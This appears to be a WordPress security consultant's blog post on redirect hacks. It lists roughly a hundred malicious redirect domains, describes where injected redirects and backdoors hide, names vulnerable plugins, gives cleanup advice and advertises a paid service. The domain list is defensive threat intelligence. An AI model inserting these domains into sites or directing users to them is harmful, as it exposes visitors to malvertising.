WordPress Redirect Hack

WordPress Sicherheit / Updates

Many current WordPress hacks that I’m seeing are redirecting all visitors to a foreign domain. These “malware redirects” or “spam forwarding” are being used to send malvertising to all your website visitors.

This article looks at how this redirection occurs and what variations are possible. Because the redirects do not always occur on every visit (and are often deliberately hidden from admin users!), this type of hack may remain undetected for a long time.

One thing is certain: Remedial action must be taken urgently so that valuable traffic is not lost and your customers are not attacked.

Update: August 3, 2024. Balada Injector Hackers are increasingly active again, and many websites are currently being attacked. Litespeed Cache is often to blame; this needs to be deactivated and then all backdoors removed.

Update: 18/08/2023: There are still a lot of redirect attacks going on – mainly because of the same problems due to insecure plugins and missing updates!

If you don’t want to waste any time, and want to protect your website visitors please contact me for immediate professional help & cleanup.

Common Domain names actively used in WordPress redirects

egocoattell.live

redfiretobind.com

bluefiretobind.com

rdntocdns.com

taskscompletedlists.com

recordsbluemountain.com

roselinetoday.com

bluelitetoday.com

redselectorpage.com

blueselectorpage.com

greenstepcherry.com

bluestepcherry.com

decentralappps.com

linestoget.com

stratosbody.com

quartzquester.top

viqtorywins.com

clickandanalytics.com

predictivdisplay.com

firstblackphase.com

sortyellowapples.com

descriptionscripts.com

scriptsplatform.com

cdn.statisticline.com

desirebluestock.com

actraffic.com

importraffic.com

trackersline.com

violetlovelines.com

specialblueitems.com

weatherpillatform.com

admarketlocation.com

travelfornamewalking.ga

transandfiestas.ga

helpmart.ga

jQueryNS.com

legendarytable.com

greengoplatform.com

transportgoline.com

drakefollow.com

confirmacionsb.com

classicpartnerships.com

specialadves.com

lovegreenpencils.ga

linetoadsactive.com

secondaryinformtrand.com

donatelloflowfirstly.ga

hostingcloud.racing

lowerthenskyactive.ga

lowerbeforwarden.ml

polimer.xyz

deliverygoodstrategies.com

gabriellalovecats.com

watch-video.net

bnmjjwinf292.com

name0fbestway.com

declarebusinessgroup.ga

sinistermousemove.art

url-partners.g2afse.com

buyittraffic.com

cuttraffic.com

puttraffic.com

importtraffic.com

decimalprovehour5.live

trendopportunityfollow.ga

examhome.net

saskmade.net

stat.trackstatisticsss.com

sferverification.com

poponclick.info

train.developfirstline.com

letsmakeparty3.ga

beforwardplay.com

belaterbewasthere.com

waterflowpick24.live

2.8mono.biz

dontstopthismusics.com

lobbydesires.com

blackentertainments.com

fox.trackstatisticsss.com

graizoah.com

asoulrox.com

ofgogoatan.com

stivenfernando.com

fast.destinyfernandi.com

trackstatisticsss.com

check.resolutiondestin.com

dest.collectfasttracks.com

digestcolect.com

verybeatifulantony.com

gotosecond2.com

forwardmytraffic.com

crazytds.club

WordPress Sicherheit / Updates

WordPress spam redirects – hiding places for the malware

In principle, automatic redirects can be placed in any file loaded by the WordPress system.
In addition, there are also frequent script injections directly into the database.
There are various hiding places for spam redirects that I’ve seen in the last months:

  • Javascript injections in PHP files (especially in theme and plugin files)
  • Javascript files, injected at the beginning of all JS files on server
  • Script injections in pages and articles (wp-posts database table)
  • URL of website (as set in wp-options database table) changed to hackers domain
  • Modified .htaccess files (often in many folders)
  • Via advertising networks (hacked ad servers)

In addition to the spam redirects there are always multiple backdoors added, and often several admin users are added to WordPress to allow the hackers full access even once the vulnerable plugins have been patched.

A partial list of vulnerable plugins being used

The vast majority of these attacks are targeted at vulnerabilities that were patched months or even years ago.  If you have any of these plugins installed in your website make sure you are using the latest secure updated !

  • Duplicator
  • Page Builder by SiteOrigin
  • ThemeGrill Demo Importer
  • Profile Builder
  • WP GDPR Compliance
  • Coming Soon and Maintenance Mode

How do I avoid these problems?

As with most WordPress attacks, the solution is to update all your plugins and WordPress core regularly.  Also make sure to remove (and not just deactivate) any plugins that are not required.

How to restore your website if you are infected

There are two ways to restore an infected website: by restoring a recent, clean backup or by removing all malware and backdoors that otherwise allow hackers to keep coming back.

  1. Restore a backup

Since these attacks generally infect 100 or even 1000 files as well as the database, the best recovery method is to delete the entire WordPress directory (make sure your backup is OK before doing this !!) and reinstall from a clean backup. Then also restore your database from a clean backup.

  1. Manually remove all malware and backdoors

If this is not possible you should contact a professional for help – with the right tools and knowledge the cleanup can be completed in 2-3 hours and your website can be put back online.

I can have your website clean, safe and online within hours for just US$149 (€129) – contact me now for immediate help!